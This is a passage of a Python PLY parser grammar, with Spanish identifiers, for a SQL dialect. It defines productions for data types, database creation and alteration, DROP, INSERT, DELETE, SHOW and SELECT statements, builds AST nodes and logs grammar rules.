ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo5(t):
'I_TIPO : NUMERIC'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "NUMERIC" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo5_1(t):
'I_TIPO : NUMERIC PABRE NUMERO COMA NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "NUMERIC" "(" "NUMERO" "," "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],t[5],t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo5_2(t):
'I_TIPO : NUMERIC PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "NUMERIC" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo6(t):
'I_TIPO : REAL'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "REAL" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo7(t):
'I_TIPO : DOUBLE PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "DOUBLE" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo8(t):
'I_TIPO : MONEY'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "MONEY" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo9(t):
'I_TIPO : CHARACTER VARYING PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "CHARACTER" "VARYING" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[4],None,"CHARACTER VARYING"),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST("CHARACTER VARYING"))
ret.getNodo().setHijo(NodoAST(str(t[4])))
t[0] = ret
def p_tipo9_1(t):
'I_TIPO : CHARACTER PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "CHARACTER" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo11(t):
'I_TIPO : VARCHAR PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "VARCHAR" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo22(t):
'I_TIPO : CHAR PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "CHAR" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo33(t):
'I_TIPO : TEXT'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "TEXT"')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo44(t):
'I_TIPO : TIMESTAMP'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "TIMESTAMP"')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo44_1(t):
'I_TIPO : TIMESTAMP PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "TIMESTAMP" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo55(t):
'I_TIPO : TIME'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "TIME"')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo55_1(t):
'I_TIPO : TIME PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "TIME" "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[3],None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tipo66(t):
'I_TIPO : DATE'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "DATE"')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo77(t):
'I_TIPO : INTERVAL I_FIELDS'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "INTERVAL" <I_FIELDS> ')
ret = Retorno(TipoDato(None,None,t[2]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
def p_tipo77_1(t):
'I_TIPO : INTERVAL I_FIELDS PABRE NUMERO PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "INTERVAL" <I_FIELDS> "(" "NUMERO" ")" ')
ret = Retorno(TipoDato(t[4],None,t[2]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[2]))
ret.getNodo().setHijo(NodoAST(str(t[4])))
t[0] = ret
def p_tipo88(t):
'I_TIPO : BOOLEAN'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "BOOLEAN" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_tipo99(t):
'I_TIPO : ID'
global reporte_gramatical
reporte_gramatical.append('<I_TIPO> ::= "ID" ')
ret = Retorno(TipoDato(None,None,t[1]),NodoAST("TIPO DATO"))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
# TERMINA TIPO DE DATOS
def p_fields(t):
'I_FIELDS : MONTH'
global reporte_gramatical
reporte_gramatical.append('<I_FIELDS> ::= "MONTH" ')
t[0] = t[1]
def p_fields1(t):
'I_FIELDS : HOUR'
global reporte_gramatical
reporte_gramatical.append('<I_FIELDS> ::= "HOUR" ')
t[0] = t[1]
def p_fields2(t):
'I_FIELDS : MINUTE'
global reporte_gramatical
reporte_gramatical.append('<I_FIELDS> ::= "MINUTE" ')
t[0] = t[1]
def p_fields3(t):
'I_FIELDS : SECOND'
global reporte_gramatical
reporte_gramatical.append('<I_FIELDS> ::= "SECOND" ')
t[0] = t[1]
def p_fields4(t):
'I_FIELDS : YEAR'
global reporte_gramatical
reporte_gramatical.append('<I_FIELDS> ::= "YEAR" ')
t[0] = t[1]
# CREATE DATABASE
def p_Replace(t):
'I_REPLACE : CREATE OR REPLACE DATABASE IF NOT EXISTS ID COMPLEMENTO_CREATE_DATABASE PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_REPLACE> ::= "CREATE" "OR" "REPLACE" "DATABASE" "IF" "NOT" "EXISTS" "ID" <COMPLEMENTO_CREATE_DATABASE> ";"')
ret = Retorno(CreateDatabase(t[8],t[9].getInstruccion(),True,True),NodoAST("CREATE DATABASE"))
ret.getNodo().setHijo(NodoAST(t[8]))
ret.getNodo().setHijo(t[9].getNodo())
t[0] = ret
def p_Replace_1(t):
'I_REPLACE : CREATE OR REPLACE DATABASE ID COMPLEMENTO_CREATE_DATABASE PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_REPLACE> ::= "CREATE" "OR" "REPLACE" "DATABASE" "ID" <COMPLEMENTO_CREATE_DATABASE> ";"')
ret = Retorno(CreateDatabase(t[5],t[6].getInstruccion(),False,True),NodoAST("CREATE DATABASE"))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(t[6].getNodo())
t[0] = ret
def p_Replace1(t):
'I_REPLACE : CREATE DATABASE IF NOT EXISTS ID COMPLEMENTO_CREATE_DATABASE PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_REPLACE> ::= "CREATE" "DATABASE" "IF" "NOT" "EXISTS" "ID" <COMPLEMENTO_CREATE_DATABASE> ";"')
ret = Retorno(CreateDatabase(t[6],t[7].getInstruccion(),True,False),NodoAST("CREATE DATABASE"))
ret.getNodo().setHijo(NodoAST(t[6]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_Replace2(t):
'I_REPLACE : CREATE DATABASE ID COMPLEMENTO_CREATE_DATABASE PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_REPLACE> ::= "CREATE" "DATABASE" "ID" <COMPLEMENTO_CREATE_DATABASE> ";"')
ret = Retorno(CreateDatabase(t[3],t[4].getInstruccion(),False,False),NodoAST("CREATE DATABASE"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_Owmod(t):
'COMPLEMENTO_CREATE_DATABASE : OWNER IGUAL CADENA MODE IGUAL NUMERO'
global reporte_gramatical
reporte_gramatical.append('<COMPLEMENTO_CREATE_DATABASE> ::= "OWNER" "=" "CADENA" "MODE" "=" "NUMERO"')
ret = Retorno(OwnerMode(t[3],t[6]),NodoAST("VALORES"))
ret.getNodo().setHijo(NodoAST("OWNER"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST("MODE"))
ret.getNodo().setHijo(NodoAST(str(t[6])))
t[0] = ret
def p_ModOwn(t):
'COMPLEMENTO_CREATE_DATABASE : MODE IGUAL NUMERO OWNER IGUAL CADENA '
global reporte_gramatical
reporte_gramatical.append('<COMPLEMENTO_CREATE_DATABASE> ::= "MODE" "=" "NUMERO" "OWNER" "=" "CADENA" ')
ret = Retorno(OwnerMode(t[6],t[3]),NodoAST("VALORES"))
ret.getNodo().setHijo(NodoAST("MODE"))
ret.getNodo().setHijo(NodoAST(str(t[3])))
ret.getNodo().setHijo(NodoAST("OWNER"))
ret.getNodo().setHijo(NodoAST(t[6]))
t[0] = ret
def p_Owmod1(t):
'COMPLEMENTO_CREATE_DATABASE : OWNER IGUAL CADENA'
global reporte_gramatical
reporte_gramatical.append('<COMPLEMENTO_CREATE_DATABASE> ::= "OWNER" "=" "CADENA" ')
ret = Retorno(OwnerMode(t[3],None),NodoAST("VALORES"))
ret.getNodo().setHijo(NodoAST("OWNER"))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_OwmodN2(t):
'COMPLEMENTO_CREATE_DATABASE : MODE IGUAL NUMERO'
global reporte_gramatical
reporte_gramatical.append('<COMPLEMENTO_CREATE_DATABASE> ::= "MODE" "=" "NUMERO" ')
ret = Retorno(OwnerMode(None,t[3]),NodoAST("VALORES"))
ret.getNodo().setHijo(NodoAST("MODE"))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
# TERMINA CREATE DATABASE
# ALTER DATABASE
def p_tAlter(t):
'I_ALTERDB : ALTER DATABASE ID P_OPERACION_ALTERDB PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_ALTERDB> ::= "ALTER" "DATABASE" "ID" <P_OPERACION_ALTERDB> ";" ')
ret = Retorno(AlterDB(t[3],t[4].getInstruccion()),NodoAST("ALTER DATABASE"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_tAlterOpDB(t):
'P_OPERACION_ALTERDB : OWNER TO P_TIPOS_OWNER'
global reporte_gramatical
reporte_gramatical.append('<P_OPERACION_ALTERDB> ::= "OWNER" "TO" "ID" <P_TIPOS_OWNER>')
ret = Retorno(AlterDBOwner(t[3]),NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_tAlterOpDB1(t):
'P_OPERACION_ALTERDB : MODE TO NUMERO'
global reporte_gramatical
reporte_gramatical.append('<P_OPERACION_ALTERDB> ::= "MODE" "TO" "NUMERO"')
ret = Retorno(AlterDBMode(t[3]),NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(str(t[3])))
t[0] = ret
def p_tAlterOpDB2(t):
'P_OPERACION_ALTERDB : RENAME TO CADENA'
global reporte_gramatical
reporte_gramatical.append('<P_OPERACION_ALTERDB> ::= "RENAME" "TO" "CADENA"')
ret = Retorno(AlterDBRename(t[3]),NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_TipoOwner(t):
'P_TIPOS_OWNER : CADENA'
global reporte_gramatical
reporte_gramatical.append('<P_TIPOS_OWNER> ::= "CADENA"')
t[0] = t[1]
def p_TipoOwner1(t):
'P_TIPOS_OWNER : CURRENT_USER'
global reporte_gramatical
reporte_gramatical.append('<P_TIPOS_OWNER> ::= "CURRENT_USER"')
t[0] = t[1]
def p_TipoOwner2(t):
'P_TIPOS_OWNER : SESSION_USER'
global reporte_gramatical
reporte_gramatical.append('<P_TIPOS_OWNER> ::= "SESSION_USER"')
t[0] = t[1]
def p_TipoOwner3(t):
'P_TIPOS_OWNER : ID'
global reporte_gramatical
reporte_gramatical.append('<P_TIPOS_OWNER> ::= "ID"')
t[0] = t[1]
# TERMINA ALTER DATABASE
# DROP TABLE
def p_dropTB(t):
'I_DROP : DROP TABLE ID PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_DROP> ::= "DROP" "TABLE" "ID" ";" ')
ret = Retorno(DropT(t[3]),NodoAST("DROP"))
ret.getNodo().setHijo(NodoAST("TABLE"))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
# TERMINA DROP TABLE
# DROP DATABASE
def p_dropDB(t):
'I_DROP : DROP DATABASE IF EXISTS ID PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_DROP> ::= "DROP" "DATABASE" "IF" "EXISTS" "ID" ";" ')
ret = Retorno(IfExist1(t[5],True),NodoAST("DROP"))
ret.getNodo().setHijo(NodoAST("DATABASE"))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_DropDBid(t):
'I_DROP : DROP DATABASE ID PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_DROP> ::= "DROP" "DATABASE" "ID" ";" ')
ret = Retorno(IfExist1(t[3],False),NodoAST("DROP"))
ret.getNodo().setHijo(NodoAST("DATABASE"))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
# TERMINA DROP DATABASE
def p_AlterDB(t):
'I_ALTERDB : DATABASE ID I_OPALTERDB I_VALALTDB PCOMA'
def p_opAlterDB(t):
'I_OPALTERDB : RENAME TO'
def p_opAlterDB2(t):
'I_OPALTERDB : OWNER TO'
def p_valAlterDb(t):
'I_VALALTDB : ID'
def p_valAlterDb1(t):
'I_VALALTDB : CADENA'
# INSERT
def p_insertTB(t):
'I_INSERT : INSERT INTO ID VALUES PABRE I_LVALT PCIERRA PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_INSERT> ::= "INSERT" "INTO" "ID" "VALUES" "(" <I_LVALT> ")" ";" ')
ret = Retorno(Insert(t[3],None,t[6].getInstruccion()),NodoAST("INSERT"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[6].getNodo())
t[0] = ret
def p_insertTB1(t):
'I_INSERT : INSERT INTO ID PABRE I_LVALT PCIERRA VALUES PABRE I_LVALT PCIERRA PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_INSERT> ::= "INSERT" "INTO" "ID" "(" <I_LVALT> ")" "VALUES "(" <I_LVARLT> ")" ";" ')
ret = Retorno(Insert(t[3],t[5].getInstruccion(),t[9].getInstruccion()),NodoAST("INSERT"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[5].getNodo())
ret.getNodo().setHijo(t[9].getNodo())
t[0] = ret
def p_lValt(t):
'I_LVALT : I_LVALT COMA I_VALTAB'
global reporte_gramatical
reporte_gramatical.append('<L_LVALT> ::= <I_LVALT> "," <I_VALTAB>')
val = t[1].getInstruccion()
val.append(t[3].getInstruccion())
ret = Retorno(val,NodoAST("VALOR"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_lValt1(t):
'I_LVALT : I_VALTAB'
global reporte_gramatical
reporte_gramatical.append('<L_LVALT> ::= <I_VALTAB>')
val = [t[1].getInstruccion()]
ret = Retorno(val,NodoAST("VALOR"))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_valTab(t):
'I_VALTAB : CONDICION'
global reporte_gramatical
reporte_gramatical.append('<I_VALTAB> ::= <CONDICION>')
t[0] = t[1]
def p_valTabMd51(t):
'I_VALTAB : MD5 PABRE CADENA PCIERRA'
global reporte_gramatical
reporte_gramatical.append('<I_VALTAB> ::= "MD5" "(" "CADENA" ")"')
ret = Retorno(Md5(t[3]),NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
# TERMINA INSERT
def p_update(t):
'I_UPDATE : UPDATE ID SET I_LUPDATE PWHERE PCOMA'
def p_lUpdate(t):
'I_LUPDATE : I_LUPDATE COMA I_VALUPDATE'
def p_lUpdate1(t):
'I_LUPDATE : I_VALUPDATE'
def p_valUpdate(t):
'I_VALUPDATE : CONDICION'
# SHOW
def p_show(t):
'I_SHOW : SHOW DATABASES PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_SHOW> ::= "SHOW" "DATABASE" ";" ')
ret = Retorno(Show(t[2]),NodoAST("SHOW"))
#ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
# TERMINA SHOW
# DELETE
def p_delete(t):
'I_DELETE : DELETE FROM ID PWHERE PCOMA'
global reporte_gramatical
reporte_gramatical.append('<I_DELETE> ::= "DELETE" "FROM" "ID" <PWHERE> ";" ')
ret = Retorno(DeleteFrom(t[3],t[4].getInstruccion()),NodoAST(t[1]))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
# TERMINA DELETE
#--------------------------------------------------------------------------------
def p_ISelect(t):
'I_SELECT : SELECT VALORES PFROM LCOMPLEMENTOS'
#CLASE SELECT MINIMO
def p_ISelect2(t):
'I_SELECT : SELECT VALORES PFROM PWHERE LCOMPLEMENTOS'
# INSTRUCCION SELECT WITH WHERE
def p_ISelect3(t):
'I_SELECT : SELECT VALORES PFROM PWHERE'
# INSTRUCCION SELECT WITH WHERE
def p_ISelect4(t):
'I_SELECT : SELECT DISTINCT VALORES PFROM LCOMPLEMENTOS'
# INSTRUCCION SELECT DISTINCT
def p_ISelect6(t):
'I_SELECT : SELECT DISTINCT VALORES PFROM PWHERE LCOMPLEMENTOS'
# INSTRUCCION SELECT DISTINCT WITH WHERE
def p_ISelect7(t):
'I_SELECT : SELECT DISTINCT VALORES PFROM PWHERE'
# INSTRUCCION SELECT DISTINCT WITH WHERE
def p_ISelect5(t):
'I_SELECT : SELECT DISTINCT VALORES PFROM'
global reporte_gramatical
reporte_gramatical.append("<I_SELECT> ::= \"SELECT\" \"DISTINCT\" <VALORES> <PFROM>")
if isinstance(t[3], str):
ret = Retorno(Select(t[3],t[4].getInstruccion(),None,None,True),NodoAST("SELECT"))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
else:
ret = Retorno(Select3(t[3].getInstruccion(), t[4].getInstruccion(), None, None, None), NodoAST("SELECT"))
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_ISelect1(t):
'I_SELECT : SELECT VALORES PFROM'
global reporte_gramatical
reporte_gramatical.append("<I_SELECT> ::= \"SELECT\" <VALORES> <PFROM>")
if isinstance(t[2], str):
ret = Retorno(Select3(t[2],t[3].getInstruccion(),None,None,False),NodoAST("SELECT"))
ret.getNodo().setHijo(NodoAST(t[2]))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
else:
ret = Retorno(Select3(t[2].getInstruccion(), t[3].getInstruccion(), None, None, False), NodoAST("SELECT"))
ret.getNodo().setHijo(t[2].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ISelect8(t):
'I_SELECT : SELECT VALORES'
global reporte_gramatical
reporte_gramatical.append("<I_SELECT> ::= \"SELECT\" <VALORES>")
if isinstance(t[2], str):
ret = Retorno(Select3(t[2],None,None,None,False),NodoAST("SELECT"))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
else:
ret = Retorno(Select3(t[2].getInstruccion(), None, None, None, False), NodoAST("SELECT"))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_ISelect9(t):
'I_SELECT : SELECT DISTINCT VALORES '
global reporte_gramatical
reporte_gramatical.append("<I_SELECT> ::= \"SELECT\" \"DISTINCT\" <VALORES>")
if isinstance(t[2], str):
ret = Retorno(Select3(t[2], None, None, None, True), NodoAST("SELECT"))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
else:
ret = Retorno(Select3(t[2].getInstruccion(), None, None, None, True), NodoAST("SELECT"))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_LComplementoS(t):
'LCOMPLEMENTOS : LCOMPLEMENTOS COMPLEMENTO '
def p_LComplementoS1(t):
'LCOMPLEMENTOS : COMPLEMENTO '
def p_ComplementoH(t):
'COMPLEMENTO : PGROUPBY'
def p_ComplementoHa(t):
'COMPLEMENTO : PHAVING'
def p_ComplementoO(t):
'COMPLEMENTO : PORDERBY '
def p_ComplementoL(t):
'COMPLEMENTO : PLIMIT '
def p_ComplementoSelectUnion(t):
'COMPLEMENTOSELECT : UNION I_SELECT PCOMA '
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"UNION\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectUnion(t[2].getInstruccion()), t[2].getNodo())
t[0] = ret
def p_ComplementoSelectUnionAll(t):
'COMPLEMENTOSELECT : UNION ALL I_SELECT PCOMA '
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"UNION\" \"ALL\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectUnionAll(t[3].getInstruccion()), t[3].getNodo())
t[0] = ret
def p_ComplementoSelectIntersect(t):
'COMPLEMENTOSELECT : INTERSECT I_SELECT PCOMA '
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"INTERSECT\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectIntersect(t[2].getInstruccion()), t[2].getNodo())
t[0] = ret
def p_ComplementoSelectIntersectALL(t):
'COMPLEMENTOSELECT : INTERSECT ALL I_SELECT PCOMA '
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"INTERSECT\" \"ALL\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectIntersectALL(t[3].getInstruccion()), t[3].getNodo())
t[0] = ret
def p_ComplementoSelectExcept(t):
'COMPLEMENTOSELECT : EXCEPT I_SELECT PCOMA '
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"EXCEPT\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectExcept(t[2].getInstruccion()), t[2].getNodo())
t[0] = ret
def p_ComplementoSelectExceptAll(t):
'COMPLEMENTOSELECT : EXCEPT ALL I_SELECT PCOMA '
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \"EXCEPT\" \"ALL\" <I_SELECT> \";\"")
ret = Retorno(ComplementoSelectExceptAll(t[3].getInstruccion()), t[3].getNodo())
t[0] = ret
def p_ComplementoSelectExceptPcoma(t):
'COMPLEMENTOSELECT : PCOMA '
# INSTRUCCION COMPLEMENTOSELECTEXCEPTPCOMA
global reporte_gramatical
reporte_gramatical.append("<COMPLEMENTOSELECT> ::= \";\"")
t[0] = None
def p_Limit(t):
'PLIMIT : LIMIT CONDICION '
def p_LimitOff(t):
'PLIMIT : LIMIT CONDICION OFFSET CONDICION '
def p_OrderBy(t):
'PORDERBY : ORDER BY LCOMPLEMENTOORDERBY '
def p_ComplementoOrderL(t):
'LCOMPLEMENTOORDERBY : LCOMPLEMENTOORDERBY COMA COMPLEMENTOORDERBY '
def p_ComplementoOrderL1(t):
'LCOMPLEMENTOORDERBY : COMPLEMENTOORDERBY '
def p_ComplementoOrderCI(t):
'COMPLEMENTOORDERBY : CONDICION COMPLEMENTOORDERBY1 '
def p_ComplementoOrderCOBC(t):
'COMPLEMENTOORDERBY1 : COMPLEMENTOORDER '
def p_ComplementoOrder(t):
'COMPLEMENTOORDER : ASC '
def p_ComplementoOD(t):
'COMPLEMENTOORDER : DESC '
def p_ComplementoOANF(t):
'COMPLEMENTOORDER : ASC NULLS FIRST '
def p_ComplementoOANL(t):
'COMPLEMENTOORDER : ASC NULLS LAST '
def p_ComplementoODNF(t):
'COMPLEMENTOORDER : DESC NULLS FIRST '
def p_ComplementoODNL(t):
'COMPLEMENTOORDER : DESC NULLS LAST '
def p_ComplementoEm(t):
'COMPLEMENTOORDER : EMPTY '
def p_Having(t):
'PHAVING : HAVING CONDICION '
def p_GroupBy(t):
'PGROUPBY : GROUP BY LCOMPLEMENTOGROUP '
def p_ComplementoGroupL(t):
'LCOMPLEMENTOGROUP : LCOMPLEMENTOGROUP COMA COMPLEMENTOGROUP '
def p_ComplementoGroupLS(t):
'LCOMPLEMENTOGROUP : COMPLEMENTOGROUP '
def p_ComplementoGroupC(t):
'COMPLEMENTOGROUP : CONDICION '
def p_Valores(t):
'VALORES : POR '
global reporte_gramatical
reporte_gramatical.append("<VALORES> ::= *")
t[0] = t[1]
def p_ValoresLista(t):
'VALORES : LISTAVALORES '
global reporte_gramatical
reporte_gramatical.append("<VALORES> ::= <LISTAVALORES>")
t[0] = t[1]
def p_ListaValores(t):
'LISTAVALORES : LISTAVALORES COMA VALOR '
global reporte_gramatical
reporte_gramatical.append("<LISTAVALORES> ::= <LISTAVALORES> \",\" <VALOR>")
val = t[1].getInstruccion()
val.append(t[3].getInstruccion())
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ListaValoresS(t):
'LISTAVALORES : VALOR '
global reporte_gramatical
reporte_gramatical.append("<LISTAVALORES> ::= <VALOR>")
val = [t[1].getInstruccion()]
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_ValorSub(t):
'VALOR : PABRE SUBCONSULTA PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"(\" <SUBCONSULTA> \")\" <ALIAS>")
ret = Retorno(Subconsulta(t[2].getInstruccion(), t[4].getInstruccion()), NodoAST("AS"))
ret.getNodo().setHijo(t[2].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_ValorCountAa(t):
'VALOR : COUNT PABRE POR PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"*\" \")\" <ALIAS>")
ret = Retorno(FuncionAgregacion('COUNT', None, t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorCounta(t):
'VALOR : COUNT PABRE ID PCIERRA ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"ID\" \")\" <ALIAS>")
val_id = Id(t[3], None)
ret = Retorno(FuncionAgregacion('COUNT', val_id, t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorCountA(t):
'VALOR : COUNT PABRE POR PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"*\" \")\"")
ret = Retorno(FuncionAgregacion('COUNT', None, t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
t[0] = ret
def p_ValorCount(t):
'VALOR : COUNT PABRE ID PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"COUNT\" \"(\" \"ID\" \")\"")
val_id = Id(t[3], None)
ret = Retorno(FuncionAgregacion('COUNT', val_id, t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('COUNT'))
ret.getNodo().setHijo(NodoAST(t[3]))
t[0] = ret
def p_ValorCountAliasId(t):
